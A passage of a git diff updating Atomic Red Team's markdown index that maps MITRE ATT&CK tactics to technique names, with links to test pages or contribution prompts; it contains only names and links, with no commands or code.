TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | +| | | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 7bff2d93..a2fa1917 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md 
@@ -1,108 +1,114 @@ # All Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) | -| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application 
Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
[AppleScript](../../T1059.002/T1059.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) | +| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE 
A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal 
Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [External Remote Services](../../T1133/T1133.md) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) 
| [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Local Accounts](../../T1078.003/T1078.003.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage 
Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DCSync](../../T1003.006/T1003.006.md) | [Local Account](../../T1087.001/T1087.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) | -| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Python](../../T1059.006/T1059.006.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | -| | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Web Session Cookie [CONTRIBUTE 
A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | -| | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multiband 
Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | -| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | -| | [Systemd Timers](../../T1053.006/T1053.006.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | 
[Emond](../../T1546.014/T1546.014.md) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | [Unix Shell](../../T1059.004/T1059.004.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | [Visual Basic](../../T1059.005/T1059.005.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Service 
Discovery](../../T1007/T1007.md) | | [Screen Capture](../../T1113/T1113.md) | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | [Windows Command Shell](../../T1059.003/T1059.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [OS Credential Dumping](../../T1003/T1003.md) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | [Windows Management Instrumentation](../../T1047/T1047.md) | [Emond](../../T1546.014/T1546.014.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Cracking](../../T1110.002/T1110.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Remote Access Software](../../T1219/T1219.md) | | -| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Standard Encoding](../../T1132.001/T1132.001.md) | | -| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Controller Authentication [CONTRIBUTE A 
